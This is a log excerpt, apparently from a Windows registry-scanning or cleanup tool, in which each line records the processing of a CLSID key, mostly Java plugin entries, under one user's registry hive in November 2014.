[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.202] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.202] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.202] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.202] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{E19F9331-3110-11D4-991C-005004D3B3DB}]
